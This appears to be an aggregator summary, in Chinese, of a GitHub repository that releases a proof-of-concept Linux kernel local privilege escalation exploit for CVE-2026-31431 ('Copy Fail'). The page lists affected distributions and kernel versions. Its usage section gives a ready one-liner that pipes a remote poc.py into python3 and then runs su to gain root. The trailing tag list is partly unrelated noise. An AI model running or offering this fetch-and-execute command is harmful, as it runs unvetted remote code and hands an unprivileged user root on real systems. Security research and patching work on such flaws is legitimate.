wvverez/CVE-2026-31431-Copy-Fail

GitHub: wvverez/CVE-2026-31431-Copy-Fail

针对CVE-2026-31431的Linux内核本地提权漏洞概念验证代码,利用authencesn密码学模板缺陷实现从普通用户到root的权限提升。

Stars: 1 | Forks: 0

# 🐧 CVE-2026-31431-Copy-Fail

## 使用方式 ``` curl -s https://raw.githubusercontent.com/wvverez/CVE-2026-31431-Copy-Fail/refs/heads/main/poc.py | python3 && su ``` ## 描述 Copy Fail 是一个**本地提权**漏洞利用程序,针对 Linux 内核的 `authencesn` 密码学模板(CVE-2026-31431)中的一个逻辑缺陷。它允许**非特权本地用户**对任何可读文件的**页缓存**执行受控的 4 字节写入,从而危及整个系统。 | 属性 | 值 | |----------|-------| | **CVE ID** | CVE-2026-31431 | | **类型** | 本地提权 | | **攻击向量** | 本地 | | **影响** | 完全获取 root 权限 | | **漏洞利用大小** | 732 字节 | | **公开发布日期** | 2026 年 4 月 29 日 | ## 受影响的系统 | 发行版 | 内核版本 | 状态 | |--------------|----------------|--------| | Debian 13 (Trixie) | 6.12.63+ | ✅ 存在漏洞 | | Ubuntu 24.04 LTS | 6.17.0-1007-aws | ✅ 存在漏洞 | | RHEL 10.1 | 6.12.0-124.45.1 | ✅ 存在漏洞 | | SUSE Linux 16 | 6.12.0-160000.9 | ✅ 存在漏洞 | | Amazon Linux 2023 | 6.18.8-9.213 | ✅ 存在漏洞 | 📚 完整说明:https://wvverez.gitbook.io/wvverez-docs/cves/cve-2026-31431
标签:0day, Amazon Linux, CVE-2026-31431, Debian, LPE, Page Cache, PoC, Python, RHEL, SUSE, Web报告查看器, 代码执行, 内核漏洞, 协议分析, 子域名枚举, 安全渗透, 密码学模板, 数据展示, 无后门, 暴力破解, 本地提权, 权限提升, 漏洞分析, 系统安全, 红队, 网络安全, 路径探测, 逆向工具, 隐私保护, 零日漏洞